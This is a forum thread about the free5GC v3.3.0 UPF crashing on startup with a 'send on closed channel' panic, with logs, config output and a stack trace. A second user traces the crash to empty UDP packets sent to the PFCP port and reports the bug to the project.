Latest v3.3.0 UPF crashing on startup

Hi,

my UPF/PFCP server keeps crashing as soon as it starts in a few seconds. UPF is running separate from all the other free5gc components without the N3IWF if that makes a difference.

The main error seems to be “panic: send on closed channel”

I verifed that gtp module is loaded.

Anything i am missing? Anyone else encountering similar issues? Its failing consistently

~/free5gc$ ./run.sh
log path: ./log/20231003_000057/
2023-10-03T00:00:57.445156729Z [INFO][UPF][Main] UPF version:
	free5GC version: v3.3.0
	build time:      2023-09-29T23:05:35Z
	commit hash:     4474dc86
	commit time:     2023-06-08T03:37:39Z
	go version:      go1.17.8 linux/amd64
2023-10-03T00:00:57.445646359Z [INFO][UPF][CFG] Read config from [./config/upfcfg.yaml]
2023-10-03T00:00:57.445888028Z [INFO][UPF][CFG] ==================================================
2023-10-03T00:00:57.445908001Z [INFO][UPF][CFG] (*factory.Config)(0xc0003e2be0)({
	Version: (string) (len=5) "1.0.3",
	Description: (string) (len=31) "UPF initial local configuration",
	Pfcp: (*factory.Pfcp)(0xc000411a10)({
		Addr: (string) (len=12) "10.66.98.190",
		NodeID: (string) (len=12) "10.66.98.190",
		RetransTimeout: (time.Duration) 1s,
		MaxRetrans: (uint8) 3
	}),
	Gtpu: (*factory.Gtpu)(0xc000411bc0)({
		Forwarder: (string) (len=5) "gtp5g",
		IfList: ([]factory.IfInfo) (len=1 cap=1) {
			(factory.IfInfo) {
				Addr: (string) (len=12) "10.66.98.190",
				Type: (string) (len=2) "N3",
				Name: (string) "",
				IfName: (string) "",
				MTU: (uint32) 0
			}
		}
	}),
	DnnList: ([]factory.DnnList) (len=1 cap=1) {
		(factory.DnnList) {
			Dnn: (string) (len=8) "internet",
			Cidr: (string) (len=12) "10.60.0.0/24",
			NatIfName: (string) ""
		}
	},
	Logger: (*factory.Logger)(0xc0003bb1a0)({
		Enable: (bool) true,
		Level: (string) (len=4) "info",
		ReportCaller: (bool) false
	})
})
2023-10-03T00:00:57.445973036Z [INFO][UPF][CFG] ==================================================
2023-10-03T00:00:57.445984349Z [INFO][UPF][Main] Log level is set to [info]
2023-10-03T00:00:57.445998632Z [INFO][UPF][Main] Report Caller is set to [false]
2023-10-03T00:00:57.446173859Z [INFO][UPF][Main] starting Gtpu Forwarder [gtp5g]
2023-10-03T00:00:57.446187899Z [INFO][UPF][Main] GTP Address: "10.66.98.190:2152"
2023-10-03T00:00:57.453305208Z [INFO][UPF][BUFF] buff netlink server started
2023-10-03T00:00:57.453365416Z [INFO][UPF][Perio] perio server started
2023-10-03T00:00:57.453379396Z [INFO][UPF][Gtp5g] Forwarder started
2023-10-03T00:00:57.453520533Z [INFO][UPF][PFCP][LAddr:10.66.98.190:8805] starting pfcp server
2023-10-03T00:00:57.453540642Z [INFO][UPF][PFCP][LAddr:10.66.98.190:8805] pfcp server started
2023-10-03T00:00:57.453551405Z [INFO][UPF][Main] UPF started
MongoDB shell version v3.6.8
connecting to: mongodb://127.0.0.1:27017/free5gc
Implicit session: session { "id" : UUID("618ac29b-3a9b-497c-bb12-28e308a3e7cd") }
MongoDB server version: 3.6.8
false
2023-10-03T00:01:02.532424745Z [INFO][UPF][PFCP][LAddr:10.66.98.190:8805] pfcp server stopped
2023-10-03T00:01:13.062752299Z [FATA][UPF][PFCP][LAddr:10.66.98.190:8805] panic: send on closed channel
goroutine 22 [running]:
runtime/debug.Stack()
	/usr/local/go/src/runtime/debug/stack.go:24 +0x65
github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).receiver.func1()
	/home/zuser/free5gc/NFs/upf/internal/pfcp/pfcp.go:192 +0x5d
panic({0x827580, 0x92e1c0})
	/usr/local/go/src/runtime/panic.go:1038 +0x215
github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).receiver(0xc0001161a0, 0xc00044d210)
	/home/zuser/free5gc/NFs/upf/internal/pfcp/pfcp.go:212 +0x1c5
created by github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main
	/home/zuser/free5gc/NFs/upf/internal/pfcp/pfcp.go:112 +0x1ef [pfcp.go:192][func1()]

Additional logs on trace mode.

2023-10-03T22:11:45.348880252Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receiver starts to read...
MongoDB shell version v3.6.8
connecting to: mongodb://127.0.0.1:27017/free5gc
Implicit session: session { "id" : UUID("16fa63ad-c7d4-4e05-ad31-58f981fdbe17") }
MongoDB server version: 3.6.8
false
./run.sh: line 112: mongosh: command not found
2023-10-03T22:11:49.151354918Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receiver reads message(len=0)
2023-10-03T22:11:49.151415023Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receiver starts to read...
2023-10-03T22:11:49.151432651Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receive buf(len=0) from rcvCh
2023-10-03T22:11:49.151487946Z [INFO][UPF][PFCP][LAddr:10.66.98.190:8805] pfcp server stopped
2023-10-03T22:12:00.163145824Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receiver reads message(len=0)
2023-10-03T22:12:00.163272620Z [FATA][UPF][PFCP][LAddr:10.66.98.190:8805] panic: send on closed channel

Hi @arvindn05,

I use a method to reproduce the error condition, but I’m not sure if it is the same as your case.
My procedure is as follows:

  1. Execute the UPF only, in my case, the PFCP server of UPF will listen on 127.0.0.8:8805
  2. I wrote a script to send empty data to the PFCP server twice.
  3. It will produce the same error message as you provided.

Maybe you can check if there is any process that keeps sending empty data to the PFCP server of UPF.

I am listening on “10.66.98.190” instead of just localhost…let me try your suggestion of just listening on localhost to eliminate the possibility of someone senidng empty data.

@Johnson3310 Thank you very much for the tip. That was the issue, empty UDP packets being sent causes the UPF to crash.
Should i file a bug for this? or do you know if its a known issue?

Hi @arvindn05,

What did you mean “UPF is running separate from all the other free5gc components without the N3IWF if that makes a difference.” .
Is the UPF running on another machine?

yes. I am running UPF seperate from the other core components.
Basically in the start.sh i set the NF_LIST="" so only UPF process is started.

And on the “Core” machine i run all the NF’s expect the UPF while pointing the SMF to UPF machine IP in the config.

Hi @arvindn05,

Should i file a bug for this? or do you know if its a known issue?

I already reported it to the free5GC team, thank you for reporting the bug.